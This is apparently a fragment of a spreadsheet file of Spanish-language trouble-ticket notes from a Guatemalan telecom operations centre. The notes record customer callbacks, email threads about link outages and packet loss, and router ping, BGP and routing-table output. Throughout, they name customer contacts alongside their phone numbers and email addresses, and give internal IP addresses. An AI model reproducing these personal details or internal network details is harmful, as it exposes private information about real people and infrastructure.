!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 192.168.20.1 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    3000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 27/49/64 MS
&lt;EESCGTESN1T1A03B02EIM3&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARDOQUEO ORTEGA 53520130 MENCIONA QUE VOLVIERON A PRESENTAR CAIDAS EN EL SERVICIO
9:04 - 9:14
10:10 - 10:23
-ID 2001566541</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARDOQUEO ORTEGA 53520130 NO CONTESTO IVR ENVIA A BUZON, ID: 2001459482.</t>
  </si>
  <si>
    <t>F4578679</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALFREDO BANEGAS AL 87743905 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001502712
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA AL 3204297 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001490157
**</t>
  </si>
  <si>
    <t>F4578681</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN HERRERA AL 36894258 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001559054
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 36894258 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, TIEMPO DE MONITOREO HA FINALIZADO, SE PIDE APOYO A CNOC CLARO VÍA SKYPE VER COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>F4578684</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAYRIN ESTEFANI QUIROA 58008464 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PRA MAÑANA A LAS  8:00 HRS
-ID 2001459380</t>
  </si>
  <si>
    <t>F4578691</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, ESTIMADOS VALIDAR MEDIANTE SD, GRACIAS.
ASUNTO:  RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525946OH ::: TICKET CNOC IMGMD005142 ::: FUERA DE SERVICIO</t>
  </si>
  <si>
    <t>F4578695</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA MAÑANA A LAS 10:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE CHACON AL 54329322 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001558431
**</t>
  </si>
  <si>
    <t>F4578704</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE PARA SOLICITAR ACCESOS VISITA DIA LUNES 30/05 A LAS 9 AM || PENDIENTE CONFIRMACIÓN
ASUNTO: VISITA TÉCNICA ID1371003SV || LAGEO S.A. DE C.V. || SAN FRANCISCO
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID1371003SV || LAGEO S.A. DE C.V. || SAN FRANCISCO AGUA AGRIA/ GUADCASERIO SN FCO AGUA AGRIA CALLE PRINCIPAL SAN VICENTE/TEPETITAN.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR MEDIO Y EQUIPOS EL DÍA LUNES 30/05 A PARTIR DE LAS 9:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>F4578745</t>
  </si>
  <si>
    <t>CRONOS ANTERIORES INDICAN SEGUIMIENTO CON CLIENTE MAÑANA A PARTIR DE LAS 09:00AM</t>
  </si>
  <si>
    <t>SE CONSULTA CON CC Y MENCIONA QUE SE TENIA EL TICKET SD1129002 / F4578258 POR CAIDA TOTAL PERO CON AUTORIZACION DE JUAN MANUEL SE APERTURO F4578745 POR RENDIMIENTO
QUEDA PENDIENTE PARA EL MARTES A LAS 9:00 HRS REALIZAR PRUEBAS DE REDUNDANCIA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO PERALTA 54136232 MENCIONA QUE ESTAN PENDIENTES UNAS PRUEBAS PARA EL MARTES A LAS 9:00 HRS
-ID 2001465655</t>
  </si>
  <si>
    <t>F4578774</t>
  </si>
  <si>
    <t>SE TIENE TTK DE REMEDY SWITCH SE ENCUENTRA FDS SE DA SEGUIMIENTO CON INC000028968873  -  TAS000007155805 DE REMEDY</t>
  </si>
  <si>
    <t>F4578793</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
VIE 27/05/2022 4:26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ENLACE PRINCIPAL SE ENCUENTRA CAID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78793¿¿
ID: 8900477T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0073
UBICADO EN:
AGE.73.- 4 CALLE Y 5 AVENIDA ZONA 1 LOCAL 0. AGUACATAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS. ¿
¿</t>
  </si>
  <si>
    <t>F4578855</t>
  </si>
  <si>
    <t>***-- CL SOLICITA SE LE CONTACTE PARA LAS PRUEBAS, SE NOTIFICA AL GESTOR A CARGO  VÍA SKYPE  --**
DE: WILSON LUNA [MAILTO:WILSONLUNA@ICASA.COM.GT]
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 01:42
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MAYNOR LARIOS &lt;MAYNORLARIOS@ICASA.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; CLIENTES VIP &lt;CLIENTESVIP@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ERROR EN INTERFACE ID: 86100041 // PERDIDA DE PAQUETES
BUENOS DÍAS,
PODRÍAN CONTACTARNOS PARA REALIZAR VALIDACIONES AL NUMERO PROPORCIONADO, GRACIAS
SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL GUSTAVO DUARTE 66209720 EXT 871084 NO RESPONDE SE INTENTARA LUEGO **
ID 2001555865
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 12:01
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: ERROR EN INTERFACE ID: 86100041 // PERDIDA DE PAQUETES
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>SE HABLÓ CON MYNOR LARIOS/CLIENTE 66209720 EXT 113021 SE LE INDICA ENLACE OK, SIN EMBARGO INSISTE QUE PERSISTE LO REPORTADO, SE LE PIDE PRUEBAS, INDICA QUE LAS ENVIARÁ POR CORREO.</t>
  </si>
  <si>
    <t>***--- CL ENVÍA CORREO AGRADECIENDO EL APOYO Y SOLICITANDO MONITOREO A LAS 10:00 HRS --***
DE: WILSON LUNA [MAILTO:WILSONLUNA@ICASA.COM.GT]
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 04:49
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTES VIP &lt;CLIENTESVIP@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;
ASUNTO: RE: ERROR EN INTERFACE ID: 86100041 // PERDIDA DE PAQUETES
BUENAS NOCHES,
GRACIAS POR EL APOYO, SEGÚN LO CONVERSADO, POR FAVOR DEJAR EL SERVICIO EN MONITOREO HASTA LAS 10:00HRS, ACTUALMENTE OBSERVAMOS EL SERVICIO SIN PERDIDA DE PAQUETES, SI ERRORES.
SALUDOS.</t>
  </si>
  <si>
    <t>F4578858</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL DIAZ AL 72742051 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001490629
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL DIAZ AL 72742051 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001504927
**</t>
  </si>
  <si>
    <t>F4578902</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NERY HERNANDEZ 48994287 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO ELIBERTO MENDOZA - 40506694
-ID 2001509699</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE ELIBERTO MENDOZA - 40506694 MENCIONA QUE TODO ESTA FUNCIONANDO DE MANERA CORRECTA, POSIBLEMENTE FUE PROBLEMA DE ENERGIA
-ID 2001510900 - 201511188</t>
  </si>
  <si>
    <t>F4578934</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA VIA TELEFONICA SE ENVIA CORREO A ESPERA DE RESPUESTA DEL CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 22:03
PARA: JORGE.RAMOS@VIDAREAL.COM.TV &lt;JORGE.RAMOS@VIDAREAL.COM.TV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO A TTK SD1129498
ESTIMADO CLIENTE DÁNDOLE SEGUIMIENTO A SU CASO ES NECESARIO PODER SOLICITARLE SU APOYO CON PODER BRINDARNOS UN CONTACTO EN EL LUGAR DONDE SE ENCUENTRAN LOS EQUIPOS PARA PODER REALIZAR UNAS PRUEBAS FISICAS EN LOS EQUIPOS DE ULTIMA MILLA YA QUE SE TIENE ACCESO A UNO PERO NO AL OTRO AGRADEZCO SU APOYO A LA ESPERA DE SU RESPUESTA.</t>
  </si>
  <si>
    <t>F4578937</t>
  </si>
  <si>
    <t>SE PROCEDE CON CIERRE EL CLIENTE SOLICITO MONITOREO HASTA LAS 6:30 AM</t>
  </si>
  <si>
    <t>F4578973</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE CAIDO SE PROCEDE A DEJAR EN ETAP PENDIENTE CLIENTE POR ENERGIA COMERCIAL SE VALIDARA AL FINAL DE TURNO.
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_DEPTAL 10.174.142.82
  PING 10.174.142.82: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.142.82 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.142.82
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.142.80/28  DIRECT  0    0             D   10.174.142.81   VLANIF2205			</t>
  </si>
  <si>
    <t>F4579022</t>
  </si>
  <si>
    <t>ENALCE OPERATIVO A NIVEL WAN SE PROCEDE A VALIDAR ALARMAS EN EL CIRCUITO YA QUE SE ENCONTRO  OPERATIVO Y NO SE TINEE GESTION DEL EQUIPO PARA VALIDAR SI SE TUVO ALGUN  EVENTO SOBRE EL SERVICIO .
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VPN-INSTANCE SCOTIA_INT 10.17.127.125                PING 10.17.127.125: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.17.127.125: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 10.17.127.125: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.17.127.125: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.17.127.125: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.17.127.125: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.17.127.125 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;
&lt;PPANPAC0N2T1A01A01EID1&gt;TELNET VPN-INSTANCE SCOTIA_INT 10.17.127.125
TRYING 10.17.127.125 ...
PRESS CTRL+K TO ABORT
ERROR: FAILED TO CONNECT TO THE REMOTE HOST.
&lt;PPANPAC0N2T1A01A01EID1&gt;</t>
  </si>
  <si>
    <t>SE HABLÓ CON OSWALDO HERNÁNDEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 KARINA RUIZ MENCIONA QUE EL TICKET INTERNO YA ESTA CERRADO
-ID 2001549670</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE CL CONSULTANDO  MAS DETALLES  O UBICACIÓN --**
DE: TREJO GUTIERREZ ANGEL [MAILTO:TGANGEL@UNINET.COM.MX]
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 04:29
PARA: TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002898::: "IP SLA ALARMADA Y PÉRDIDA DE PAQUETES"
BUEN DÍA TEAM.
NOS PODRÍAN COMPARTIR MAYOR INFORMACIÓN DE LA DESCONEXIÓN POR FAVOR, NO S PUEDEN COMPARTIR LA UBICACIÓN.</t>
  </si>
  <si>
    <t>SE REVISA NUEVAMENTE DONDE NO SE OBSERVAN PERDIDAS NI TIEMPOS ALTOS EN EL SERVICIO.
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -C 1000 -S 1500 -M 50 -B -VPN-INSTANCE SCOTIA_INT 10.17.127.125
  PING 10.17.127.125: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.17.127.125 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/7 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO AL CLEINTE PENDIENTE DE RESPUESTA DEL MISMO.
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 5:04
PARA: TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002898::: "IP SLA ALARMADA Y PÉRDIDA DE PAQUETES"
ESTIMADOS CLIENTE SE ADJUNTA INFORMACIÓN DONDE SE VALIDA DE LA ADYACENCIA AL SISTEMA AUTÓNOMO DONDE NO SE PERCIBEN INCONVENIENTES CON EL SERVICIO SE TUVO UNA EN NUESTRO CIRCUITO, PERO SE VALIDA QUE NO AFECTO SU SERVICIO.
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE SCOTIA_INT PEER
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIA_INT, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.17.127.125                    4       65503   510215   626722     0 1348H57M ESTABLISHED       20
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP  SCOTIA_INT 10.17.127.125 VERBOSE
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIA_INT
SUMMARY COUNT : 1
DESTINATION: 10.17.127.124/30
     PROTOCOL: DIRECT             PROCESS ID: 0
   PREFERENCE: 0                        COST: 0
      NEXTHOP: 10.17.127.126       NEIGHBOUR: 0.0.0.0
        STATE: ACTIVE ADV                AGE: 56D04H59M02S
          TAG: 0                    PRIORITY: CRITICAL
        LABEL: NULL                  QOSINFO: 0X0
   INDIRECTID: 0X10003A7            INSTANCE:
 RELAYNEXTHOP: 0.0.0.0             INTERFACE: GIGABITETHERNET1/0/10.1032
     TUNNELID: 0X0                     FLAGS: D
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE  SCOTIA_INT PEER | I 10.17.127.125
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIA_INT, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 1                 PEERS IN ESTABLISHED STATE : 1
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.17.127.125                    4       65503   510223   626731     0 1348H58M ESTABLISHED       20
&lt;PPANPAC0N2T1A01A01EID1&gt;
POR FAVOR VALIDAR EVIDENCIAS ESTIMADOS A ESPERA DE SU RESPUESTA SI NECESITAN ALGUNA OTRA EVIDENCIA SOLICITAR ALGUN DICTAMEN TECNICO YA QUE EL SERVICIO NO PRESENTA CAÍDAS EN 1348H57M A ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE PARA QUE PUEDA VALIDAR OPERATIVIDAD DEL SERVICIO SE ENVIO CORREO CON EVIDENCIA.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA VALIDACION CON CLIENTE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 4:07
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002898::: "IP SLA ALARMADA Y PÉRDIDA DE PAQUETES"
ESTIMADO CLIENTE SE ENVÍAN PRUEBAS DONDE VERIFICAMOS QUE NO SE ENCUENTRAN TIEMPOS ALTOS EN EL SERVICIO NI PERDIDAS POR FAVOR CONFIRMAR QUE SE ENCUENTRE OPERATIVO Y SIN TIEMPOS ALTOS.
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -C 1000 -S 1500 -M 50 -B -VPN-INSTANCE SCOTIA_INT 10.17.127.125
  PING 10.17.127.125: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.17.127.125 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/7 MS</t>
  </si>
  <si>
    <t>F4579031</t>
  </si>
  <si>
    <t>***--- TELMEX COMPARTE CONTACTOS LOCALES PARA DESCARTES  E INDICA QUE ATIENDE A LAS 06:00 -***
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 04:22
